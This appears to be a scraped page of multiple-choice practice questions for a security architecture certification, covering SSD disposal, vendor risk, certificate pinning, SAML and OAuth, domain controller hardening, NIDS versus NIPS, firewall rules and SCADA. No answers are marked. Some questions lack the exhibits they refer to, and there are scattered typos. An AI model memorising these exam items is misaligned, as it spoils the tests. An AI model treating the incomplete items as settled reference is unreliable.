Which of the following would be the MOST secure way to dispose of the SSDs given the CISO's concern?

Degaussing

Overwiting

Shredding

Formatting

Incinerating

93. The Chief information Officer (CIO) of a large bank, which uses multiple third-party organizations to deliver a service, is concerned about the handling and security of customer data by the parties.

Which of the following should be implemented to BEST manage the risk?

Establish a review committee that assesses the importance of suppliers and ranks them according to contract renewals. At the time of contract renewal, incorporate designs and operational controls into the contracts and a right-to-audit clause. Regularly assess the supplier’s post-contract renewal with a dedicated risk management team.

Establish a team using members from first line risk, the business unit, and vendor management to assess only design security controls of all suppliers. Store findings from the reviews in a database for all other business units and risk teams to reference.

Establish an audit program that regularly reviews all suppliers regardless of the data they access, how they access the data, and the type of data, Review all design and operational controls based on best practice standard and report the finding back to upper management.

Establish a governance program that rates suppliers based on their access to data, the type of data, and how they access the data Assign key controls that are reviewed and managed based on the supplier’s rating. Report finding units that rely on the suppliers and the various risk teams.

94. An organization is assessing the security posture of a new SaaS CRM system that handles sensitive Pll and identity information, such as passport numbers. The SaaS CRM system does not meet the organization's current security standards.

The assessment identifies the following:

1- There will be a $20,000 per day revenue loss for each day the system is delayed going into production.

2- The inherent risk is high.

3- The residual risk is low.

4- There will be a staged deployment to the solution rollout to the contact center.

Which of the following risk-handling techniques will BEST meet the organization's requirements?

Apply for a security exemption, as the risk is too high to accept.

Transfer the risk to the SaaS CRM vendor, as the organization is using a cloud service.

Accept the risk, as compensating controls have been implemented to manage the risk.

Avoid the risk by accepting the shared responsibility model with the SaaS CRM provider.

95. A developer is creating a new mobile application for a company. The application uses REST API and TLS 1.2 to communicate securely with the external back-end server. Due to this configuration, the

company is concerned about HTTPS interception attacks.

Which of the following would be the BEST solution against this type of attack?

Wildcard certificates

HSTS

Certificate pinning

96. An organization is implementing a new identity and access management architecture with the following objectives:

Supporting MFA against on-premises infrastructure

Improving the user experience by integrating with SaaS applications

Applying risk-based policies based on location

Performing just-in-time provisioning

Which of the following authentication protocols should the organization implement to support these requirements?

Kerberos and TACACS

SAML and RADIUS

OAuth and OpenID

OTP and 802.1X

97. A security administrator has been tasked with hardening a domain controller against lateral movement attacks.

Below is an output of running services:

Which of the following configuration changes must be made to complete this task?

Stop the Print Spooler service and set the startup type to disabled.

Stop the DNS Server service and set the startup type to disabled.

Stop the Active Directory Web Services service and set the startup type to disabled.

Stop Credential Manager service and leave the startup type to disabled.

98. 1.An organization is referencing NIST best practices for BCP creation while reviewing current internal organizational processes for mission-essential items.

Which of the following phases establishes the identification and prioritization of critical systems and functions?

Review a recent gap analysis.

Perform a cost-benefit analysis.

Conduct a business impact analysis.

Develop an exposure factor matrix.

99. A recent data breach revealed that a company has a number of files containing customer data across its storage environment. These files are individualized for each employee and are used in tracking various customer orders, inquiries, and issues. The files are not encrypted and can be accessed by anyone. The senior management team would like to address these issues without interrupting existing processes.

Which of the following should a security architect recommend?

A DLP program to identify which files have customer data and delete them

An ERP program to identify which processes need to be tracked

A CMDB to report on systems that are not configured to security baselines

A CRM application to consolidate the data and provision access based on the process and need

100. A company is looking to fortify its cybersecurity defenses and is focusing on its network infrastructure. The solution cannot affect the availability of the company’s services to ensure false positives do not drop legitimate traffic.

Which of the following would satisfy the requirement?

NIDS

NIPS

WAF

Reverse proxy

Page 11 of 11

101. A security architect is reviewing the following proposed corporate firewall architecture and configuration:

Both firewalls are stateful and provide Layer 7 filtering and routing.

The company has the following requirements:

Web servers must receive all updates via HTTP/S from the corporate network.

Web servers should not initiate communication with the Internet.

Web servers should only connect to preapproved corporate database servers.

Employees’ computing devices should only connect to web services over ports 80 and 443.

Which of the following should the architect recommend to ensure all requirements are met in the MOST secure manner? (Choose two.)

Add the following to Firewall_A: 15 PERMIT FROM 10.0.0.0/16 TO 0.0.0.0/0 TCP 80,443

Add the following to Firewall_A: 15 PERMIT FROM 192.168.1.0/24 TO 0.0.0.0 TCP 80,443

Add the following to Firewall_A: 15 PERMIT FROM 10.0.0.0/16 TO 0.0.0.0/0 TCP/UDP 0-65535

Add the following to Firewall_B: 15 PERMIT FROM 0.0.0.0/0 TO 10.0.0.0/16 TCP/UDP 0-65535

Add the following to Firewall_B: 15 PERMIT FROM 10.0.0.0/16 TO 0.0.0.0 TCP/UDP 0-65535

Add the following to Firewall_B: 15 PERMIT FROM 192.168.1.0/24 TO 10.0.2.10/32 TCP 80,443

102. A cloud security architect has been tasked with selecting the appropriate solution given the following:

* The solution must allow the lowest RTO possible.

* The solution must have the least shared responsibility possible. « Patching should be a responsibility of the CSP.

Which of the following solutions can BEST fulfill the requirements?

Paas

laas

Private

Saas

103. A company is deploying multiple VPNs to support supplier connections into its extranet applications.

The network security standard requires:

• All remote devices to have up-to-date antivirus

• An up-to-date and patched OS

Which of the following technologies should the company deploy to meet its security objectives? (Select TWO)

NAC

WAF

NIDS

Reverse proxy

NGFW

Bastion host

104. Which of the following controls primarily detects abuse of privilege but does not prevent it?

Off-boarding

Separation of duties

Least privilege

Job rotation

105. A security architect is implementing a web application that uses a database back end. Prior to the production, the architect is concerned about the possibility of XSS attacks and wants to identify

security controls that could be put in place to prevent these attacks.

Which of the following sources could the architect consult to address this security concern?

SDLC

OVAL

IEEE

OWASP

106. A security consultant needs to protect a network of electrical relays that are used for monitoring and controlling the energy used in a manufacturing facility.

Which of the following systems should the consultant review before making a recommendation?

CAN

ASIC

FPGA

SCADA

Facebook Twitter LinkedIn Google + Email